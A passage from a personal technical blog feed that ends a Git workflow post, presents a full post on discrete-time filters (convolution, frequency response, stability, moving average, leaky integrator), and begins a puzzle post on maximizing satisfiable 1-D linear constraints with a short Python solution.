id="post-editing">Post-editing</h2> <p>I usually want to fix typos or reword phrases after the post has been published. For this flow I don’t bother creating branches nor squash commits and do all from the <code class="language-plaintext highlighter-rouge">master</code> branch in <code class="language-plaintext highlighter-rouge">draft-blog</code>.</p> <figure class="highlight"><pre><code class="language-bash" data-lang="bash">git checkout master <span class="c"># fix / reword ...</span> git commit <span class="nt">-am</span> <span class="s1">'fix typos'</span> git push public</code></pre></figure> <h2 id="conclusion">Conclusion</h2> <p>I only use Git for basic stuff (at work we use some flavor of Mercurial) and whenever I have to do some operation I’m not used to, Git gives me impostor syndrome.</p> <p>I think I got a good handle of working with remotes through this process of trying to document my workflow. Having to setup another remote made and looking into different <code class="language-plaintext highlighter-rouge">push</code> behaviors  made things a lot clearer.</p> <p>Though it’s worth noting my flow is super simple because I mostly write in one computer (occasionally I also write in a Linux machine) and each post is its own file, so conflicts are almost non-existent.</p> <h2 id="references">References</h2> <ul> <li>[<a href="https://stackoverflow.com/questions/7983204/having-a-private-branch-of-a-public-repo-on-github">1</a>] Stack Overflow: Having a private branch of a public repo on GitHub?</li> <li>[<a href="https://stackoverflow.com/questions/25356810/git-how-to-squash-all-commits-on-branch">2</a>] Git: How to squash all commits on branch</li> <li>[<a href="https://docs.github.com/en/github/creating-cloning-and-archiving-repositories/creating-a-repository-on-github/duplicating-a-repository">3</a>] Duplicating a repository</li> <li>[<a href="https://stackoverflow.com/questions/948354/default-behavior-of-git-push-without-a-branch-specified">4</a>] Default behavior of “git push” without a branch specified</li> </ul>Guilherme KunigamiThis is a meta post to describe my flow for writing posts. When I moved to static Github pages over a year ago, I didn’t have a flow that I was satisfied with but I’ve recently settled in one which I think is worth documenting.Discrete Time Filters2021-08-31T00:00:00+00:002021-08-31T00:00:00+00:00https://www.kuniga.me/blog/2021/08/31/discrete-time-filters<!-- This needs to be define as included html because variables are not inherited by Jekyll pages --> <p>In this post we’ll learn about discrete filters, including definitions, some properties and examples.</p> <!--more--> <h2 id="discrete-filter">Discrete Filter</h2> <p>A <strong>discrete-time system</strong> is a transform that takes in discrete-time sequences as inputs and produces another discrete-time sequence at its output. In the general case we can think of it as a function $\mathscr{H}$ from a vector $\vec{x}$ to another vector $\vec{y}$ that is also dependent on the time parameter $t$:</p> $y_t = \mathscr{H}(\vec{x}, t)$ <p>Note: the input of the function is $\vec{x}$, not $x_t$ because $y_t$ could depend on more than just $x_t$, for example a window function where $y_t = x_{t-1} + x_{t} + x_{t+1}$.</p> <p>A discrete-time system is said <strong>linear</strong> if it satisfies:</p> $\mathscr{H}(\alpha \vec{x} + \beta \vec{y}, t) = \alpha \mathscr{H}(\vec{x}, t) + \beta \mathscr{H}(\vec{y}, t)$ <p>A discrete-time system is said <strong>time-invariant</strong> if it doesn’t actually depend on $t$. That is, if we shift the signal $x$ (by adding a delay $\Delta$), the output is also shift but doesn’t change.</p> <p>In  the authors provide a good example to make this distinction clear. A transform $\mathscr{H}(x_t, t) = t x_t$ is time-<em>variant</em>, because if we shift $\vec{x}$ by $1/2$ the output doesn’t simply shift, it changes “shape”.</p> <figure class="center_children"> <img src="https://www.kuniga.me/resources/blog/2021-08-31-discrete-filters/time-dependent.png" alt="2 charts describing before and after a time dependent transform" /> <figcaption>Figure 1: Time-dependent Transform.</figcaption> </figure> <p>On the other hand $\mathscr{H}(x_t, t) = x^2_t$ is time-invariant, since the output for the shifted $\vec{x}$ is basically $\vec{y}$ shifted by the same amount.</p> <figure class="center_children"> <img src="https://www.kuniga.me/resources/blog/2021-08-31-discrete-filters/time-independent.png" alt="2 charts describing before and after a time independent transform" /> <figcaption>Figure 2: Time-independent Transform.</figcaption> </figure> <p>A discrete-time system that is both <em>linear</em> and <em>time-invariant</em> (also known as LTI) is what we call a <strong>discrete filter</strong>. We’ll focus on discrete filter in this post, so henceforth we’ll assume $\mathscr{H}$ is an LTI function.</p> <h2 id="convolution">Convolution</h2> <h3 id="the-impulse-response">The impulse response</h3> <p>An <strong>impulse signal</strong> $\delta$ is a vector filled with all zeros except the entry $t = 0$ which is 1.</p> <p>The result of applying a discrete filter $\mathscr{H}$ over $\delta$ is called an <strong>impulse response</strong>, often denoted as $h$:</p> $h_t = \mathscr{H}(\delta, t)$ <h3 id="the-reproducing-formula">The Reproducing Formula</h3> <p>We can obtain an entry for vector $\vec{x}$ at $t$ by multiplying itself with $\delta$:</p> $(1) \quad x_t = \sum_{k = -\infty}^{\infty} x_k \delta_{t - k}$ <p>which is known as the <strong>reproducing formula</strong>. To see why this identity is true, we observe that the only case in which $\delta_{t - k}$ is non-zero is when $k = t$.</p> <h3 id="convolution-operator">Convolution Operator</h3> <p>We can apply $\mathscr{H}$ over (1) to get $y_t$:</p> $y_t = \mathscr{H}(\vec{x}, t) = \mathscr{H}(\sum_{k = -\infty}^{\infty} x_k \delta_{t - k}, t)$ <p>One key observation is that in (1), $x_k$ can be seen as the scalar multiplying the variable $\delta_{t - k}$ (though I’m not super sure on the rationale). Thus we can apply the linearity principle to obtain:</p> $y_t = \sum_{k = -\infty}^{\infty} x_k \mathscr{H}(\delta_{t - k}, t) = \sum_{k = -\infty}^{\infty} x_k h_{t - k}$ <p>This last sum is the definition of the convolution operator for a given index $t$, which is basically a inner product of infinite length vectors where one of the vectors have its index $k$ reversed ($-k$) and then shifted ($-k + t$).</p> <p>We can define the convolution at the vector level, in which case it can be more simply stated using a the $*$ symbol:</p> $\vec{y} = \vec{x} * \vec{h}$ <p>We can now observe that a filter $\mathscr{H}$ can be fully described by the vector $h$.</p> <h3 id="properties">Properties</h3> <p>If the input is a square summable sequence, it’s possible to show the convolution operator is <strong>associative</strong>:</p> $(\vec{x} * \vec{h}) * \vec{w} = \vec{x} * (\vec{h} * \vec{w})$ <p>If $\vec{h}$ and $\vec{w}$ are the impulse responses of filters $\mathscr{H}$ and $\mathscr{W}$, this implies there exists a filter whose impulse response is $(\vec{h} * \vec{w})$ which is equivalent to passing $\vec{x}$ through filters $\mathscr{H}$ and then $\mathscr{W}$.</p> <p>The convolution operator is <strong>commutative</strong>, so the order in which we apply filters is irrelevant.</p> <h2 id="frequency-domain">Frequency Domain</h2> <p>Suppose we feed a filter an complex exponential signal, as defined in out <a href="https://www.kuniga.me/blog/2021/07/31/discrete-fourier-transform.html">previous post</a> :</p> $x_t = A e^{i (\omega t + \phi)}$ <p>We can obtain the output via a convolution:</p> $\mathscr{H}(\vec{x}, t) = \vec{x} * \vec{h} = \sum_{k = -\infty}^{\infty} x_k h_{t - k}$ <p>Since convolution is associative,</p> $= \sum_{k = -\infty}^{\infty} h_{k} x_{t - k} = \sum_{k = -\infty}^{\infty} h_{k} A e^{i (\omega (t - k) + \phi)}$ <p>Moving the factors that do not depend on $k$ out of the sum,</p> $= A e^{i (\omega t + \phi)} \sum_{k = -\infty}^{\infty} h_k e^{- i \omega k}$ <p>Now we recall the definition of DTFT as equation (6) from :</p> $\lambda(\omega) = \sum_{t = 0}^{N-1} x_t e^{-i \omega t} \quad 0 \le \omega \le 2 \pi$ <p>With $N \rightarrow \infty$ and given it’s possible to show in this case that the sum over $[0, \infty]$ results in the same as $[-\infty, \infty]$, we can define $H(\omega)$ as the DTFT of the vector $\vec{h}$ and obtain:</p> $(2) \qquad \mathscr{H}(\vec{x}, t) = A e^{i (\omega t + \phi)} H(\omega)$ <p>$H(\omega)$ is also called the <strong>frequency response</strong> of the filter at frequency $\omega$.</p> <p>Consider the polar form of $H(\omega)$ as:</p> $H(\omega) = A_0 e^{i \theta_0}$ <p>And we define <em>amplitude</em> as $\abs{H(\omega)} = \abs{A_0}$ and the <em>phase</em> is $\angle H(\omega) = \theta_0$. When we use this canonical form in (2) we get:</p> $\mathscr{H}(\vec{x}, t) = A A_0 e^{i (\omega t + \phi + \theta_0)}$ <p>Thus we can observe the filter <em>scales</em> the amplitude of the original signal by $A_0$ and <em>shifts</em> its phase by $\theta_0$.</p> <h3 id="convolution-and-modulation">Convolution and Modulation</h3> <p>Let $\vec{x}$ and $\vec{y}$ be two absolute summable vectors and $z = x * y$ their convolution. We show that the DFTF of $z$, $Z(\omega)$, is the product of the DFTF of $x$ and $y$, $Z(\omega) = X(\omega) Y(\omega)$, which is known as the <strong>convolution theorem</strong>.</p> <p><em>Proof.</em></p> <p>Let’s apply the DTFT over the expanded sum of the convolution:</p> $Z(\omega) = \sum_{t = -\infty}^{\infty} \sum_{k = -\infty}^{\infty} x_k y_{t - k} e^{i \omega t}$ <p>Since $\vec{x}$ and $\vec{y}$ are absolute summable, these sums are finite and can be swapped and their terms re-arranged:</p> $= \sum_{k = -\infty}^{\infty} (x_k \sum_{t = -\infty}^{\infty} y_{t - k} e^{i \omega t})$ <p>We can “borrow” a factor of $e^{i \omega k}$ from $e^{i \omega t}$ just to obtain the form we want:</p> $Z(\omega) = \sum_{k = -\infty}^{\infty} (x_k e^{i \omega k} \sum_{t = -\infty}^{\infty} y_{t - k} e^{i \omega (t - k)})$ <p>We can re-index $t$ as, say $t’ = t - k$, for any $k$, so that the infinite sum is preserved (see Appendix for a more formal argument), i.e.</p> $\sum_{t = -\infty}^{\infty} y_{t - k} e^{i \omega (t - k)} = \sum_{t' = -\infty}^{\infty} y_{t'} e^{i \omega (t')}, \qquad k \in \mathbb{Z}$ <p>Then we can obtain two independent sums:</p> $Z(\omega) = (\sum_{k = -\infty}^{\infty} x_k e^{i \omega k}) (\sum_{t' = -\infty}^{\infty} y_{t'} e^{i \omega t'}) = X(\omega) Y(\omega)$ <p><em>QED.</em></p> <p>We can also show that the convolution of the DTFTs of $\vec{x}$ and $\vec{y}$ correspond to the DTFT of their product. That is, if $Z(\omega) = X(\omega) * Y(\omega)$, then $z_t = x_t y_t$, where the definition of the convolution for continuous functions is:</p> $(3) \quad X(\omega) * Y(\omega) = \int_{0}^{2 \pi} X(\sigma) Y(\omega - \sigma) d\sigma$ <p>This is known as the <strong>modulation theorem</strong>.</p> <p><em>Proof.</em></p> <p>Let’s recall the definition of the inverse of the DTFT (equation (5) in ):</p> $x_t = \frac{1}{2 \pi} \int_{0}^{2 \pi} X(\omega) e^{i \omega t} d\omega$ <p>Applying it for $Z(\omega)$:</p> $z_t = \frac{1}{2 \pi} \int_{0}^{2 \pi} X(\omega) * Y(\omega) e^{i \omega t} d\omega$ <p>Replacing (3) (commutative form):</p> $= \frac{1}{2 \pi} \int_{0}^{2 \pi} \frac{1}{2 \pi} \int_{0}^{2 \pi} X(\omega - \sigma) Y(\sigma) e^{i \omega t} d\sigma d\omega$ <p>Splitting $\omega$ into $(\omega - \sigma) + \sigma$:</p> $= \frac{1}{2 \pi} \int_{0}^{2 \pi} \frac{1}{2 \pi} \int_{0}^{2 \pi} (X(\omega - \sigma)e^{i (\omega - \sigma)}) (Y(\sigma)) e^{i \sigma t}) d\sigma d\omega$ <p>Given the periodic nature of the DFTF, shifting the indices by a given amount $\omega$ doesn’t change the result, so:</p> $\int_{0}^{2 \pi} X(\sigma) e^{i \sigma t} d\sigma = \int_{0}^{2 \pi} X(-\sigma) e^{i (-\sigma) t} d\sigma = \int_{0}^{2 \pi} X(\omega - \sigma) e^{i (\omega - \sigma) t} d\sigma$ <p>We can use this to obtain two independent sums:</p> $z_t = (\frac{1}{2 \pi} \int_{0}^{2 \pi} X(\omega - \sigma) e^{i (\omega - \sigma) t} d\sigma) (\frac{1}{2 \pi} \int_{0}^{2 \pi} Y(\omega) e^{i \sigma t}d\omega)$ <p>which correspond to $$x_t y_t$$.</p> <h2 id="properties-1">Properties</h2> <h3 id="iir-vs-fir">IIR vs FIR</h3> <p>The impulse response of a filter is always an infinite vector since the impulse vector is also infinite. The non-zeros entries on the impulse response are called <strong>taps</strong>.</p> <p><em>Infinite-impulse response</em> (<strong>IIR</strong>) are filters whose impulse responses have an infinite amount of taps, as opposed to <em>finite-impulse response</em> (<strong>FIR</strong>). The latter is a <em>finite-support</em> signal (recall it’s an infinite signal created by padding a finite one with 0s).</p> <h3 id="causality">Causality</h3> <p>A <strong>causal</strong> filter is one that does not depend on the future, which means in $y_t = \mathscr{H}(\vec{x}, t)$, $y_t$ will only be defined in terms of $x_k$ for $k \le t$. So in</p> $y_t = \sum_{k = -\infty}^{\infty} x_k h_{t - k}$ <p>we want $h_{t - k}$ to be 0 if $k &gt; t$. If we call $z = t - k$, then $k &gt; t$ implies $z &lt; 0$ and thus $h_z = 0$ for $z &lt; 0$. In other words, $\vec{h}$ must zeroes for negative indices.</p> <p>Causality is important in real-time systems, where we only have the signal up to the current timestamp $t$.</p> <h3 id="stability">Stability</h3> <p>A system is called bounded-input bounded-output (BIBO) if the output is bounded when the input is bounded. By bounded we mean that each entry in the vector is finite, or more formally, there exists $L \in \mathbb{R}^{+}$ such that $\abs{x_n} &lt; L$ for all $n$.</p> <p>A necessary and sufficient condition for a filter to be BIBO is for its impulse response $\vec{h}$ to be absolutely summable.</p> <p><strong>Proof.</strong> For the sufficiency, suppose $\vec{h}$ is absolutely summable, that is,</p> $\sum_{k = -\infty}^{\infty} \abs{h_k} &lt; \infty$ <p>We want to show $\abs{y_n}$ is bounded when $\abs{x_n}$ is bounded. We have</p> $\abs{y_n} = \abs{\sum_{k = -\infty}^{\infty} x_k h_{t - k}} \le \sum_{k = -\infty}^{\infty} \abs{x_k h_{t - k}} = \sum_{k = -\infty}^{\infty} \abs{x_k} \abs{h_{t - k}}$ <p>There exists some $L$ such that $\abs{x_n} &lt; L$, so</p> $\abs{y_n} &lt; L \sum_{k = -\infty}^{\infty} \abs{h_{t - k}}$ <p>And we started from the hypothesis the last sum is finite, so $\abs{y_n}$ is also finite.</p> <p>For the necessity, we just need to show an example where $\vec{h}$ is <strong>not</strong> absolutely summable, $\vec{x}$ is bounded and $\vec{y}$ is not. We define $x_n = \mbox{sign}(h_{-n})$, that is $x_n \in \curly{-1, 0, 1}$ and thus bounded.</p> <p>If we consider $\abs{y_t}$ for $t = 0$:</p> $\abs{y_0} = \abs{\sum_{k = -\infty}^{\infty} x_k h_{-k}}$ <p>The term $x_k h_{-k}$ is equal to $\abs{h_{-k}}$ (from our choice of $x_k$), so</p> $\abs{y_0} = \sum_{k = -\infty}^{\infty} h_{-k}$ <p>which we assumed is infinite. <em>QED</em></p> <p>Because FIR filters’ impulse response have a finite number of non-zero terms, they’re absolute summable, hence FIR filters are BIBO.</p> <h3 id="magnitude">Magnitude</h3> <p>As we discussed earlier, the amplitude of the frequency response $H(\omega)$ scales the amplitude of the original signal when a filter is applied. The frequency response is a function which can return different amplitudes for different frequencies $0 \le \omega \le 2 \pi$, and can be thus used to boost certain frequencies and atenuate others.</p> <p>We can categorize filters based on what types of frequencies it boosts (if any).</p> <ul> <li><strong>Lowpass filters.</strong> The amplification is concentrated at low frequencies $\omega = 0 = 2 \pi$.</li> <li><strong>Highpass filters.</strong> The amplification is concentrated at high frequencies $\omega = \pi$.</li> <li><strong>Bandpass filters.</strong> The amplification is concentrated at specific frequencies $\omega_p$.</li> <li><strong>Allpass filters.</strong> The amplification is uniform across the spectrum.</li> </ul> <p>The names are very intuitive, the “pass” means what types of frequencies the filter allows passing through.</p> <h3 id="phase">Phase</h3> <p>As we discussed earlier, the phase of the frequency response $H(\omega)$ corresponds to a shift on the frequencies of the input signal. In time domain, this corresponds to a delay.</p> <p>Consider a sinusoidal signal, $x_t = e^{i (\omega t)}$ and let’s assume $t$ is continuous. Suppose we apply a filter with amplitude $A_0 = 1$ and phase $\theta_0$. Once we apply the filter we get $y_t = e^{i (\omega t + \theta_0)}$.</p> <p>Using Euler’s identity, the real part of $y_t$ is $\cos (\omega t + \theta_0)$. If we define $t_0 = - \frac{\theta_0}{\omega}$, known as <strong>phase delay</strong>, we have $\cos (\omega (t - t_0))$. If we’re to plot this (continuous) function, we’ll see each point $x_t$ got delayed by an amount $t_0$ in $y_t$.</p> <p>For the discrete time case, because we’re sampling at regular intervals that might not align with the delay, there might not be a 1:1 mapping between $x_t$ and $y_t$.</p> <p>The frequency response $H(\omega)$ might have different phases for different frequencies $\omega$, thus each frequency of the input signal might be shifted by different amounts, so even if the filter has amplitude $A_0 = 1$, the “shape” of the output signal might be different.</p> <p><strong>Linear Phase.</strong> A linear phase filter is when its phase function $\angle H(\omega)$ is linear on $\omega$, that is, $\angle H(\omega) = \omega d$, $d \in \mathbb{R}$.</p> <p>Assuming $A_0 = 1$, now the output signal is $y_t = e^{i (\omega (t + d))}$, thus the signal gets shifted by the same amount on all its frequency and the “shape” of the output would be the same as the input.</p> <p><strong>Locally Linear Phase.</strong> Even for non-linear phase filters, it’s possible to have approximately linear behavior around specific frequencies.</p> <p>Consider a specific frequency $\omega_0$ and any other frequency $\omega$ around it, and $\omega - \omega_0 = \tau$. We can approximate $\angle H(\omega)$ by a linear function around $\omega_0$ by using a first order Taylor approximation:</p> $\angle H(\omega_0 + \tau) = \angle H(\omega_0) + \tau \angle H'(\omega_0)$ <p>We then have</p> $H(\omega_0 + \tau) = \abs{H(\omega_0 + \tau)} e^{i \angle H(\omega_0 + \tau)} = (\abs{H(\omega_0 + \tau)} e^{i \angle H(\omega_0)}) e^{i \angle H'(\omega_0) \tau}$ <p>We can see this as an extra phase shift of $\angle H’(\omega_0) \tau$. The negative of $\angle H’(\omega_0)$ is defined as the <strong>group delay</strong>.</p> <h2 id="examples">Examples</h2> <p>Let’s consider two basic filters and investigate some of their properties.</p> <h3 id="moving-average">Moving Average</h3> <p>A classic example of filter is the moving average, which consits of taking the average of the previous $N$ samples:</p> $y_t = \mathscr{H}(\vec{x}, t) = \frac{1}{N} \sum_{k = 0}^{N - 1} x_{t - k}$ <p>We can apply $\mathscr{H}$ to $\delta$ to obtain the impulse response:</p> $h_t = \frac{1}{N} \sum_{k = 0}^{N - 1} \delta_{t - k}$ <p>Recall that the only non-zero entry in $\vec{\delta}$ is when $t = k$, so the sum is $\frac{1}{N}$, unless the range $[0, N - 1]$ doesn’t include $t$, that is, if $t &lt; 0$ or $t \ge N$, summarizing:</p> $\begin{equation} h_t =\left\{ \begin{array}{@{}ll@{}} \frac{1}{N}, &amp; \text{if}\ 0 \le t &lt; N \\ 0, &amp; \text{otherwise} \end{array}\right. \end{equation}$ <p>which means it has a finite number of non-zero entries and thus $\mathscr{H}$ is a FIR filter. This specific definition of moving average is also <em>causal</em>.</p> <p>It’s possible to show that the <em>frequency response</em> of this filter is</p> $H(\omega) = \frac{1}{N} \frac{\sin(\omega N/2)}{\sin(\omega / 2)} e^{-i \frac{N -1}{2} \omega}$ <p>If we plot the amplitude (see Figure 3), we can see that it magnifies mostly low frequencies which matches that intuition that moving average smooths a signal, removing high-frequency noises.</p> <figure class="center_children"> <img src="https://www.kuniga.me/resources/blog/2021-08-31-discrete-filters/mag-mov-avg.png" alt="Line chart of magnitude vs. frequency" /> <figcaption>Figure 3: Magnitude of the moving average filter.</figcaption> </figure> <p>We can also plot the phase delay from above, which is $\frac{N-1}{2}$. It matches the intuition that when we average the last $N$ points the “center of gravity” is in the middle of this window.</p> <figure class="center_children"> <img src="https://www.kuniga.me/resources/blog/2021-08-31-discrete-filters/phase-mov-avg.png" alt="Line chart of phase vs. frequency" /> <figcaption>Figure 4: Phase delay of the moving average filter.</figcaption> </figure> <h3 id="leaky-integrator">Leaky Integrator</h3> <p>Suppose we parametrize the moving average by the window size $N$:</p> $\mathscr{H}_N(\vec{x}, t) = \frac{1}{N} \sum_{k = 0}^{N - 1} x_{t - k}$ <p>We can then write $\mathscr{H}_{N}(\vec{x}, t)$ in terms of $\mathscr{H}_{N - 1}(\vec{x}, t - 1)$, noting that the latter is:</p> $(4) \quad \mathscr{H}_{N -1 }(\vec{x}, t - 1) = \frac{1}{N - 1} \sum_{k = 0}^{N - 2} x_{t - 1 - k} = \frac{1}{N - 1} \sum_{k = 1}^{N - 1} x_{t - k}$ <p>First we extract the first term out of the sum (i.e. the when $k = 0$):</p> $= \frac{1}{N} (x_t + \sum_{k=1}^{N-1} x_{t - k})$ <p>Normalizing the denominator of the second term to $N - 1$:</p> $= \frac{1}{N} x_{t} + \frac{N - 1}{N} \frac{1}{N - 1} \sum_{k=1}^{N-1} x_{t - k}$ <p>We can replace (4) here:</p> $= \frac{1}{N} x_{t} + \frac{N - 1}{N} \mathscr{H}_{N - 1}(\vec{x}, t - 1)$ <p>If we call $\lambda_N = \frac{N - 1}{N}$, then $\frac{1}{N} = 1 - \lambda_N$:</p> $\mathscr{H}_{N}(\vec{x}, t) = \lambda_N \mathscr{H}_{N - 1}(\vec{x}, t - 1) + (1 - \lambda_N) x_{t}$ <p>As $N$ becomes large, adding a term to the average changes little, so $\mathscr{H}_{N+1}$ and $\mathscr{H}_{N}$ become approximately the same. Thus, assuming a sufficiently large $N$ we can drop the $N$ paremeter to get:</p> $\mathscr{H}(\vec{x}, t) = \lambda \mathscr{H}(\vec{x}, t - 1) + (1 - \lambda) x_{t}$ <p>or in terms of $\vec{y}$,</p> $y_t = \lambda y_{t - 1} + (1 - \lambda) x_t$ <p>This system is known as the <strong>leaky integrator</strong>. When $\lambda \rightarrow 1$, then $N \rightarrow \infty$, and this filter is simply the sum of the terms of $\vec{x}$, thus an integrator. Since in reality it is not exactly 1, it doesn’t account for all the terms, so it “leaks”.</p> <p>It’s possible to show this is a LTI system (a filter), if we add a condition that $y_n$ “starts somewhere”, that is, before a instant $t_0$, all its entries are zero:</p> $y_t = 0, \qquad t &lt; t_0$ <p>In particular, we’ll assume $t_0 = 0$, which simplifies calculations. We can apply this filter to $\vec{\delta}$ to get an impulse response. We have for $t = 0$:</p> $h_0 = (1 - \lambda) \delta_0 = 1 - \lambda$ <p>For $t &gt; 0$, since $\delta_t = 0$, we have</p> $h_t = \lambda h_{t-1}$ <p>Which gives us a closed form:</p> $h_t = (1 - \lambda) \lambda^t, \qquad t \ge 0$ <p>This shows this impulse response is infinite, thus the leaky integrator is an IIR filter.</p> <p>It’s possible to show that the <em>frequency response</em> of this filter is</p> $H(\omega) = \frac{1 - \lambda}{1 - \lambda e^{-i \omega}}$ <p>With magnitude:</p> $\abs{H(\omega)} = \frac{(1 - \lambda)^2}{1 + \lambda^2 - 2\lambda \cos(\omega)}$ <figure class="center_children"> <img src="https://www.kuniga.me/resources/blog/2021-08-31-discrete-filters/mag-leaky-integrator.png" alt="Line chart of magnitude vs. frequency" /> <figcaption>Figure 5: Magnitude of the leaky integrator filter.</figcaption> </figure> <p>and phase:</p> $\angle H(\omega) = \arctan \left(-\frac{\lambda \sin(\omega)}{1 - \cos(\omega)}\right)$ <figure class="center_children"> <img src="https://www.kuniga.me/resources/blog/2021-08-31-discrete-filters/phase-leaky-integrator.png" alt="Line chart of magnitude vs. frequency" /> <figcaption>Figure 6: Magnitude of the leaky integrator filter.</figcaption> </figure> <h2 id="appendix">Appendix</h2> <p>In <em>Convolution and Modulation</em> we claimed that we can shift the index $t$ in an infinite sum by an arbitrary amount $k \in \mathbb{Z}$, that is, given $t’ = t - k$:</p> $\sum_{t = -\infty}^{\infty} f(t) = \sum_{t' = -\infty}^{\infty} f(t')$ <p>Let’s call $T$ the set of indices corresponding to $[-\infty, \infty]$, i.e. $T$ is the set of integers $\mathbb{Z}$.</p> <p>In the second sum we have $t’ = t - k \in [-\infty, \infty]$ or $t \in ([-\infty, \infty]) + k$, which we’ll call $T’$. $T’$ is basically $T$ with all elements plus $k$, so for every $t \in T$, there’s exactly one $t + k \in T’$. Since $k \in \mathbb{Z}$ and $\mathbb{Z}$ is closed under addition, $t + k \in \mathbb{Z}$, so every element in $T’$ exists in $T$ as well, or that if $t \in T$ then $t \in T’$.</p> <p>Conversely we can show that if $t’ \in T’$ then $t’ \in T$. For every $t’ \in T$ there’s exactly one $t’ - k \in T$ and $\mathbb{Z}$ is closed under subtraction, so $t’ \in T$ as well.</p> <p>We conclude that there’s a one-to-one mapping between $T$ and $T’$ and thus the sums are over the same set of indices. <em>QED</em>.</p> <h2 id="conclusion">Conclusion</h2> <p>As in <a href="https://www.kuniga.me/blog/2021/07/31/discrete-fourier-transform.html">Discrete Fourier Transforms</a> we used a different notation than the usual in signal processing.</p> <p>I learned a bunch of things from this post, including: convolution, the leaky integrator, the formalism behind the “delay” from moving average filters.</p> <h2 id="related-posts">Related Posts</h2> <ul> <li><a href="https://www.kuniga.me/blog/2021/07/31/lpc-in-python.html">Linear Predictive Coding in Python</a>. We ran into convolution in <em>The LPC Model</em> section. Note that the filter is denoted by $h_t$ like we did here, which is not a coincidence. I also realize I’ve been studying things backwards :)</li> </ul> <h2 id="references">References</h2> <ul> <li>[<a href="https://www.amazon.com/gp/product/B01FEKRY4A/">1</a>] Signal Processing for Communications, Prandoni and Vetterli</li> <li>[<a href="https://dspillustrations.com/pages/posts/misc/linearity-causality-and-time-invariance-of-a-system.html">2</a>] Linearity, Causality and Time-Invariance of a System</li> <li>[<a href="https://www.kuniga.me/blog/2021/07/31/discrete-fourier-transform.html">3</a>] Discrete Fourier Transforms</li> </ul> <p>All the charts have been generated using Matplotlib, the source code available as a <a href="https://github.com/kunigami/kunigami.github.io/blob/master/blog/code/2021-08-31-discrete-time-filters/charts.ipynb">Jupyter notebook</a>.</p>Guilherme KunigamiIn this post we’ll learn about discrete filters, including definitions, some properties and examples.Maximum Non-Empty Intersection of Constraints2021-08-17T00:00:00+00:002021-08-17T00:00:00+00:00https://www.kuniga.me/blog/2021/08/17/max-non-empty-intersection<!-- This needs to be define as included html because variables are not inherited by Jekyll pages --> <p>Here’s a puzzle I thought about recently: given a set of constraints of the form $ax \le b$, where $a, b \in \mathbb{R}$, find the maximum number of constraints we can choose such there exists $x \in \mathbb{R}$ that satisfies all of them.</p> <p>For example, given $x \le 2$, $3x \le 7$, $-2x \le 1$, $-2x \le -9$, we can choose $x \le 2$, $x \le 3$, $-2x \le 1$, then any $\frac{-1}{2} \le x \le 2$ satisfies all 3 of them. This also happens to be the maximum number of constraints we can choose.</p> <p>In this post we’ll explore a solution to this puzzle. Feel free to stop here and solve it before proceeding.</p> <!--more--> <h2 id="solution">Solution</h2> <p>We can simplify the problem a bit by normalizing the coeficient of $x$ so that all constraints are of either $x \le a$ or $x \ge a$ form. For example, $3x \le 7$ is normalized to $x \le \frac{7}{3}$ and $-2x \le 1$ to $x \ge -\frac{1}{2}$.</p> <p>The key observation is that in our solution we can’t have a pair $x \ge a$ and $x \le b$ if $b &lt; a$ since their intersection is already empty. This implies that in our solution, all the right-hand side (RHS) of the “$\ge$” constraints will be smaller or equal to the RHS of the “$\le$” constraints.</p> <p>Let’s sort the constraints by their RHS and break ties by having “$\ge$” show up before “$\le$” (since we could pick both $x \ge a$ and $x \le a$ for the intersection $x = a$).</p> <p>We now need to find the maximum number of “$\ge$” followed by “$\le$” constraints. Another way to frame this is: given a string of $0$s (corresponding to “$\ge$”) and $1$s (corresponding to “$\le$”) , find a subsequence such that it starts with all $0$s and ends with all $1$s. In other words, it matches the regular expression <code class="language-plaintext highlighter-rouge">\0*1*\</code>, so this is the problem we’ll be solving now.</p> <h3 id="induction">Induction</h3> <p>Suppose our input is a string $s$ of length $n$. Let $s_i$ represent the $i$-th character ($i = 1, \cdots, n$) and $s_{i,j}$ the substring $s_i, \cdots, s_j$ ($1 \le i \le j \le n$). Let’s call any string satisfying the regex <code class="language-plaintext highlighter-rouge">\0*1*\</code> a <strong>valid</strong> string.</p> <p>Let $u_i$ be the length of the largest <em>valid</em> substring of $s_{1,i}$ that ends in $1$ and $z_i$ the length of the largest <em>valid</em> substring of $s_{1,i}$ that ends in $0$. The largest <em>valid</em> substring of $s$ has to end in either $0$ or $1$, so the solution to the problem is $\max(u_n, z_n)$.</p> <p>Since we cannot have a $1$ following a $0$, the only valid substring ending in $0$ is one with all $0$s, so $z_i$ is equivalent to how many $0$s there are in $s_{1,i}$.</p> <p>How about $u_i$? Suppose we know how to compute $u_k$ for $k &lt; i$. Then if $s_i = 0$, there’s nothing we can do to extend $u_i$, so $u_i = u_{i-1}$. Otherwise, we either add $1$ to the substring represented by $u_{i-1}$ or we add it to the one full of zeros in $z_{i-1}$.</p> <p>Why is that optimal? Suppose it’s not. Then there exists a valid substring whose length is greater than $\max(u_{i-1}, z_{i-1}) + 1$. If the second to last character of that string is a $0$, we found a valid substring of $s_{1,i-1}$ greater than $z_{i-1}$, if it’s $1$, we found a valid substring of $s_{1,i-1}$ greater than $u_{i-1}$, thus in both cases we get a contradiction.</p> <h3 id="code">Code</h3> <p>We can solve this problem in $O(n)$ using constant extra memory since we only ever depend on the previous index:</p> <figure class="highlight"><pre><code class="language-python" data-lang="python"><span class="n">z</span> <span class="o">=</span> <span class="mi">0</span> <span class="n">u</span> <span class="o">=</span> <span class="mi">0</span> <span class="k">for</span> <span class="n">c</span> <span class="ow">in</span> <span class="n">s</span><span class="p">:</span> <span class="k">if</span> <span class="n">c</span> <span class="o">==</span> <span class="s">'0'</span><span class="p">:</span> <span class="n">z</span> <span class="o">+=</span> <span class="mi">1</span> <span class="k">else</span><span class="p">:</span> <span class="n">u</span> <span class="o">=</span> <span class="nb">max</span><span class="p">(</span><span class="n">u</span><span class="p">,</span> <span class="n">z</span><span class="p">)</span> <span class="o">+</span> <span class="mi">1</span> <span class="k">return</span> <span class="nb">max</span><span class="p">(</span><span class="n">u</span><span class="p">,</span> <span class="n">z</span><span class="p">)</span></code></pre></figure> <p>This allows us solving the original problem in $O(n \log n)$ (dominated by the sorting step).</p> <h2 id="generalizations">Generalizations</h2> <p>What if instead of $1$-d constraints we had $n$ dimensional ones? More formally, given a set of constraints</p> $a_{i, 1} x_1 + \cdots + a_{i, m} x_m \le b_i$ <p>For $i = 1, \cdots, n$, and we want the largest subset of these constraints such that there exists $\vec{x} = x_1, \cdots, x_m$ satisfying all of them.</p> <p>Another way to frame it in terms of combinatorial optimization: given a Linear Program, what is the minimum number of constraints we need to remove to have a feasible 